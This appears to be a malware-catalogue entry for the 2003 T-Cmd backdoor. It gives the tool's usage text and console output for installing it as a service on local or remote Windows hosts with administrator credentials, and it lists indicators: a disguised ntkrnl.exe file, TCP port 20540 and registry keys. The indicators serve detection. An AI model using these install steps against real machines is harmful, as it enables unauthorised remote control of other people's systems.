T-Cmd 1.0 beta

T-Cmd 1.0 beta
(Backdoor.TCmd.10)
by TOo2y
Released in february 2003
Made in China

Usage Show:
  T-Cmd  -Help
  T-Cmd  -Install  [RemoteHost]  [Account]  [Password]
  T-Cmd  -Remove   [RemoteHost]  [Account]  [Password]

Example:
  T-Cmd  -Install  (Install in the localhost)
  T-Cmd  -Remove   (Remove  in the localhost)
  T-Cmd  -Install  192.168.0.1  TOo2y  123456  (Install in 192.168.0.1)
  T-Cmd  -Remove   192.168.0.1  TOo2y  123456  (Remove  in 192.168.0.1)
  T-Cmd  -Install  192.168.0.2  TOo2y  NULL    (NULL instead of no password)


D:\MPJ\CUI\T-Cmd\Debug>T-Cmd -Install
Transmitting File ... Success !
Creating Service .... Success !
Starting Service .... Pending ... Success !

D:\MPJ\CUI\T-Cmd\Debug>T-Cmd -Remove
Stopping Service .... Pending ... Success !
Removing Service .... Success !
Removing File ....... Success !

D:\MPJ\CUI\T-Cmd\Debug>T-Cmd -Install 192.168.0.1 Administrator NULL
Now Connecting ...... Success !
Transmitting File ... Success !
Creating Service .... Success !
Starting Service .... Pending ... Success !
Now Disconnecting ... Success !

D:\MPJ\CUI\T-Cmd\Debug>T-Cmd -Remove 192.168.0.1 Administrator NULL
Now Connecting ...... Success !
Stopping Service .... Pending ... Success !
Removing Service .... Success !
Removing File ....... Success !
Now Disconnecting ... Success !

TOo2y


Server:
c:\WINNT\system32\ntkrnl.exe 

size: 16.896 bytes

port: 20540 TCP

platform: Windows2000/XP

added registry keys:
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\Root\LEGACY_NTKRNL 
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\Root\LEGACY_NTKRNL\0000 
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\Root\LEGACY_NTKRNL\0000\Control 
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\ntkrnl 
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\ntkrnl\Enum 
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\ntkrnl\Security 
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_NTKRNL 
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_NTKRNL\0000 
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_NTKRNL\0000\Control 
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ntkrnl 
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ntkrnl\Enum 
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ntkrnl\Security
MegaSecurity